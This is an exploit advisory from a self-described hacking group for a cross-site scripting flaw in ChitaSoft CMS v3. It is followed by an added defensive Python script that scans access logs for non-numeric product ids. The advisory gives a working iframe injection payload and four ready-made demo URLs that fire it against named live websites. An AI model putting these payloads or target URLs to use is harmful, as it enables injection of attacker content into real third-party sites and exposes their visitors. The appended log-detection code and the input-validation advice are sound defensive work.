ChitaSoft CMS version 3 suffers from a cross-site scripting vulnerability.
f2496bfce8bfd1272daa114fe6e23c1117c8a54c7bb3145226a1d3e60df3b268
######################
# Exploit Title : ChitaSoft v3 CMS Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.chitasoft.com/products/3
# Author Homepage : http://www.persian-team.ir
# Date: 2016/04/15
# Version : 3
######################
# PoC:
# product.php?id=[XSS]
# Payload = '><iframe src="http://persian-team.ir" width="450" height="200"></iframe>
# Demo:
# http://www.javdanesho.com/product.php?id=149%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
# http://www.dafpublishingco.com/product.php?id=121%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
# http://www.nashredaf.com/product.php?id=99%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
# http://www.iranmodiran.com/product.php?id=1%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Greetz : FireKernel And Milad_Hacking
# Homepage : http://www.persian-team.ir
######################
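
For defenders reviewing logs of an affected site, the following added example (not part of the original advisory or of ChitaSoft's code) flags requests to product.php whose decoded id parameter is not purely numeric, which is the pattern the PoC above relies on. The combined log format, the sample lines and the rule that legitimate ids are short positive integers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Apr/2016:10:00:01 +0000] "GET /product.php?id=149 HTTP/1.1" 200 5120
203.0.113.9 - - [15/Apr/2016:10:00:07 +0000] "GET /product.php?id=149%27%3E%3Ciframe%20src=%22http://example.invalid%22%3E%3C/iframe%3E HTTP/1.1" 200 5342
203.0.113.9 - - [15/Apr/2016:10:00:09 +0000] "GET /product.php?id=12&id=%3Cb%3E HTTP/1.1" 200 5011
203.0.113.7 - - [15/Apr/2016:10:00:11 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900
"""

# Request line inside the quoted field of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate product ids are short positive integers.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def suspicious_ids(log_text):
    """Return (line_number, decoded_id) for product.php requests with a non-numeric id."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/product.php"):
            continue
        # parse_qs percent-decodes values and keeps every repeated "id" parameter,
        # so a benign first value cannot hide a later injected one.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((lineno, value))
    return hits


if __name__ == "__main__":
    for lineno, value in suspicious_ids(SAMPLE_LOG):
        print(f"line {lineno}: non-numeric id {value!r}")
```

The same numeric-only rule, enforced server-side before the value is used and combined with HTML-escaping on output, closes the injection point the advisory describes.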